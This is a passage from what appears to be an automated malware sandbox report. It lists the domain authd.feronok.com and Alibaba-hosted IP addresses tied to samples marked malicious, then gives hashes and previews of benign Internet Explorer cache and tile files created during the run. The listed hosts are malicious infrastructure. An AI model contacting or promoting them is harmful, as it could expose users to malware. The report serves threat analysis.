cs9.wpc.v0cdn.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
authd.feronok.com	1.dll	Get hash	malicious	Browse	34.95.62.189
	racial.dll	Get hash	malicious	Browse	35.199.86.111
	racial.dll	Get hash	malicious	Browse	35.199.86.111
	racial.dll	Get hash	malicious	Browse	35.199.86.111
	racial.dll	Get hash	malicious	Browse	35.199.86.111
	racial.dll	Get hash	malicious	Browse	35.199.86.111
	racial.dll	Get hash	malicious	Browse	35.199.86.111
	info_71411.vbs	Get hash	malicious	Browse	35.199.86.111
	racial.dll	Get hash	malicious	Browse	35.199.86.111
	racial.dll	Get hash	malicious	Browse	35.199.86.111
	soft.dll	Get hash	malicious	Browse	35.199.86.111
	racial.dll	Get hash	malicious	Browse	35.199.86.111
	racial.dll	Get hash	malicious	Browse	35.199.86.111
	Know.dll	Get hash	malicious	Browse	35.199.86.111

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	X4TsxHmnQW	Get hash	malicious	Browse	8.210.125.43
	CWUk68C2h1.exe	Get hash	malicious	Browse	47.243.49.109
	CWUk68C2h1.exe	Get hash	malicious	Browse	47.243.49.109
	e90fG4wc41.exe	Get hash	malicious	Browse	8.211.6.12
	Zd1j3hnY8u.exe	Get hash	malicious	Browse	8.211.6.12
	auMLAKI4BX.exe	Get hash	malicious	Browse	8.211.6.12
	HNUQajtypz.exe	Get hash	malicious	Browse	8.211.6.12
	s1um6myHDC.exe	Get hash	malicious	Browse	8.208.27.152
	Note0093746573.exe	Get hash	malicious	Browse	8.209.99.88
	http___103.133.106.72_wd_vbc.exe	Get hash	malicious	Browse	8.209.99.88
	Invoice.exe	Get hash	malicious	Browse	161.117.85.250
	swift copy.exe	Get hash	malicious	Browse	8.209.99.88
	CARGO ARRIVAL NOTICE-MEDICOM AWB.exe	Get hash	malicious	Browse	47.253.2.59
	68avRiNoDd.exe	Get hash	malicious	Browse	8.209.68.196
	ONCK3z5a0Y.exe	Get hash	malicious	Browse	8.209.68.196
	FHnuwG4dWB.exe	Get hash	malicious	Browse	8.209.68.196
	FHnuwG4dWB.exe	Get hash	malicious	Browse	8.209.68.196
	Sbb4QCilrT.exe	Get hash	malicious	Browse	8.209.68.196
	tes.exe	Get hash	malicious	Browse	8.209.68.196
	jax.k.dll	Get hash	malicious	Browse	8.211.5.232

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{09EF2731-C841-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.772983287169734
Encrypted:	false
SSDEEP:	48:IwiGcpr5GwpLyG/ap85UGIpc52mGvnZpv52FGo1qp952IGo4Rpm52XGW/1JGWVT/:rWZzZY25UW52jt52Of52bRM52415f8B
MD5:	F0047039D92C510E826FA3722F724292
SHA1:	875A02313AA8EC48FF05D234EF2C37C305D0CBB7
SHA-256:	E58A01C579A1B54726A1859E357A2754A15521627C26EE701A71AA3F45F7F347
SHA-512:	848AE2EB1213C1CD1940C1A6660B37E76B6B31CD3D474EE048ED94A735E166E1BCF1AC5044B773E134C96E2CB75713E1D8A4B512E87E9DA4388AA113943AEEF4
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{09EF2733-C841-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28120
Entropy (8bit):	1.9092353057402882
Encrypted:	false
SSDEEP:	96:rLZAQ36VBSZjx2pWRMNlwd6QZ2oI1wd6d6QZ2oWgpr:rLZAQ36VkZjx2pWRMNls/I1H/fr
MD5:	28803DAF8FFCCE649C0C015B1A555EA6
SHA1:	DAD62007917336DFCA4D104FFEF94AA2DC0A91F9
SHA-256:	200769DF4608C1C9577F58F50E9D86CAF134724A80D35F5CBC55F4ACF4A65E50
SHA-512:	CBCC1F90F993BBD5E4286D337D4786DCB661CC86F8F0DCBEAEB1800DA358C03BF731905CDE9F38ED0011EA5F5DACB1D0BDDD245DDB5269CE7CC5DFE87B16CE80
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.040843717985966
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEpMonWimI002EtM3MHdNMNxOEpMonWimI00ObVbkEtMb:2d6NxOOMoSZHKd6NxOOMoSZ76b
MD5:	6B9654B5CA5F22C2164548A9D096480C
SHA1:	143CB516BBF18599C40A5E19400FB44A6650FCC2
SHA-256:	2380BA5BE87922269AA7A63CC1DCCA0B374A1EE6184A52FF5D7387EA68BA18D9
SHA-512:	D9C015E3102E1C8D1D2C0F759A0DA57AB57FBE6C2C4250A7AA175F5A161793FFE0AC89B1B11794C5D388FA231CA472DFDF457C64EF07D4E45591D933FE9EA5D8
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.077509552327961
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kTnWimI002EtM3MHdNMNxe2kTnWimI00Obkak6EtMb:2d6Nxr2SZHKd6Nxr2SZ7Aa7b
MD5:	6E7C25C1A0622910F446656C3D77B971
SHA1:	D3F1F79C09873942FD741F1EF10271E033551BBA
SHA-256:	72C086222AE0970AEC5D0054AFF1384D631EB869DF20D03FF29448AA16CF8B3F
SHA-512:	4F4CA17A812534944C339BBB97F0D33914462A115E5FBD29E68EC34E126E3DD1B00E3612A44AAE38EE57BA208CF55F4B196C07408390B954727ECB4EB41EFFA3
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xe0e390e5,0x01d75c4d</date><accdate>0xe0e390e5,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xe0e390e5,0x01d75c4d</date><accdate>0xe0e390e5,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.0581206084993
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLpMonWimI002EtM3MHdNMNxvLpMonWimI00ObmZEtMb:2d6Nxv9MoSZHKd6Nxv9MoSZ7mb
MD5:	9464F564BBEF02C775B6893D2199D426
SHA1:	9EA222883F510BDC1222C8B7148818A3B23BAD30
SHA-256:	933B4954F5209FDCABBC9A67D5A1C1771F753B54D8433F77F1CD33F8C18145C9
SHA-512:	5186166F34ED0F0245596670064000CE17A195131E38836119C785E7A12F5A010DF31B5A611C707AADCFB1CD21B1555F7962B622256083C32448840A1177B0D5
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.067803736919017
Encrypted:	false
SSDEEP:	12:TMHdNMNxiTnWimI002EtM3MHdNMNxiTnWimI00Obd5EtMb:2d6NxMSZHKd6NxMSZ7Jjb
MD5:	21E145FCFFFB3F4E94A251DF9817D48C
SHA1:	820A41F8CD11AA175931CAAB4E8E433D29502C96
SHA-256:	66F90DD72734A1FB2FA7E1F19591678FDEF91AB156A24D114162F281BC012062
SHA-512:	11CE5455393AE8478D7F8EEA24760F42F2A9D62710C2575D075E992C876473ACBBD71DCB33B0F3C9D2C48C4D651EFBE6C589827BB91595494881159CC657E834
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xe0e390e5,0x01d75c4d</date><accdate>0xe0e390e5,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xe0e390e5,0x01d75c4d</date><accdate>0xe0e390e5,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.075606204349789
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwpMonWimI002EtM3MHdNMNxhGwpMonWimI00Ob8K075EtMb:2d6NxQKMoSZHKd6NxQKMoSZ7YKajb
MD5:	7496A75541186C68094AF292E8489680
SHA1:	ED00F31F1B52335B8C2F7C0EC4B77EF20DB60119
SHA-256:	AF0068A73B4DE0907F9CC99D903B79BA2C50E8D5FD867F5B36681B724F7A1117
SHA-512:	8FBAD2922063A33DCCF691B18B086B9819CDA0903AB00A1839481DE9A00D3DDEC735F1C361B26C7B4CA58DAE423F5E01E9DDC5BCC7FBAC7D31314731AF9264C7
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.039283874483725
Encrypted:	false
SSDEEP:	12:TMHdNMNx0npMonWimI002EtM3MHdNMNx0npMonWimI00ObxEtMb:2d6Nx0pMoSZHKd6Nx0pMoSZ7nb
MD5:	AABC34FD747C07772AAE4336F43B9B21
SHA1:	6FAE91AC5FC1E9C069FD3BFC63F8DCECA1A20994
SHA-256:	63552A00989F00CEE54E199424D009ADCEA6ED934E22E0F07DF8632E217D12A8
SHA-512:	07B193B15E5DC5293F4E6A7C623B0FDBBFF84936DA37D064D6808B7E91ACEEAC6EABBA869F44F3721BAE981C7F02B22FE7BC675B0E4477DF2248BDF3D185D337
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.081267419256663
Encrypted:	false
SSDEEP:	12:TMHdNMNxxpMonWimI002EtM3MHdNMNxxpMonWimI00Ob6Kq5EtMb:2d6Nx/MoSZHKd6Nx/MoSZ7ob
MD5:	8473F0AC244EA0062FDBB746AD657821
SHA1:	B0E117492B62EDE106080B75A5821ADF10ECDC93
SHA-256:	8700A766CBEE959F2D483889CAA34F2F82CB0FCEE6D411057061AA8EF0D1745F
SHA-512:	ED272250B4F43ED9019D875872DF861CD989A3063EFE26FD0DE6AD8FCCBD5AD353870C3A7E6A9906FA2E7E7022E738AFDFFE9D647411032BBE64D5DE4B8F2A9C
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xe0ed1a45,0x01d75c4d</date><accdate>0xe0ed1a45,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.073579868504357
Encrypted:	false
SSDEEP:	12:TMHdNMNxcTnWimI002EtM3MHdNMNxcTnWimI00ObVEtMb:2d6Nx+SZHKd6Nx+SZ7Db
MD5:	358A297A51F48C33F354313C7F997ED0
SHA1:	1FC04A3475CF94404CA5B75AB75C4E50CD9610C4
SHA-256:	641C3E8CE7C07CBF850015BD6A69E65235B822672BD873F5CAE873C304F669A1
SHA-512:	D05C7265626AAFD27EE3AABBE4F59A7956FD50DE558C2B6CB030C410E5882D77F67F76C7FFFDBDEDAF49149B7674FFC1747E6BBE6B6A7156382B7F89A56340CF
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xe0e390e5,0x01d75c4d</date><accdate>0xe0e390e5,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xe0e390e5,0x01d75c4d</date><accdate>0xe0e390e5,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.053865342338117
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnTnWimI002EtM3MHdNMNxfnTnWimI00Obe5EtMb:2d6NxbSZHKd6NxbSZ7ijb
MD5:	5FACBF68BC885E0930CBDD5501E58E39
SHA1:	BCB29F778D7C4CED48E2CB1F6504F4291FAFD48C
SHA-256:	CB27A98E64763FBAF8BCAE8B14E411F0C37072A29F152038A445A64E233D2E37
SHA-512:	BFF46F13BA0E96E04AFD616A4CC3213B93F7038C39B46F2F6D9B2738592C5E4FD6C397E6406DC88206D5761CF184A21516B961AFAD19DD9B98C413D028A6ADF1
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xe0e390e5,0x01d75c4d</date><accdate>0xe0e390e5,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xe0e390e5,0x01d75c4d</date><accdate>0xe0e390e5,0x01d75c4d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
IE Cache URL:	res://ieframe.dll/down.png
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
IE Cache URL:	res://ieframe.dll/errorPageStrings.js
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2168
Entropy (8bit):	5.207912016937144
Encrypted:	false
SSDEEP:	24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
MD5:	F4FE1CB77E758E1BA56B8A8EC20417C5
SHA1:	F4EDA06901EDB98633A686B11D02F4925F827BF0
SHA-256:	8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
SHA-512:	62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
Malicious:	false
IE Cache URL:	res://ieframe.dll/ErrorPageTemplate.css
Preview:	.body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\bullet[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	447
Entropy (8bit):	7.304718288205936
Encrypted:	false
SSDEEP:	12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
MD5:	26F971D87CA00E23BD2D064524AEF838
SHA1:	7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
SHA-256:	1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
SHA-512:	C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
Malicious:	false
IE Cache URL:	res://ieframe.dll/bullet.png
Preview:	.PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...\|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\background_gradient[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
Category:	downloaded
Size (bytes):	453
Entropy (8bit):	5.019973044227213
Encrypted:	false
SSDEEP:	6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
MD5:	20F0110ED5E4E0D5384A496E4880139B
SHA1:	51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
SHA-256:	1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
SHA-512:	5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
Malicious:	false
IE Cache URL:	res://ieframe.dll/background_gradient.jpg
Preview:	......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
IE Cache URL:	res://ieframe.dll/httpErrorPagesScripts.js
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http_404[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	6495
Entropy (8bit):	3.8998802417135856
Encrypted:	false
SSDEEP:	48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
MD5:	F65C729DC2D457B7A1093813F1253192
SHA1:	5006C9B50108CF582BE308411B157574E5A893FC
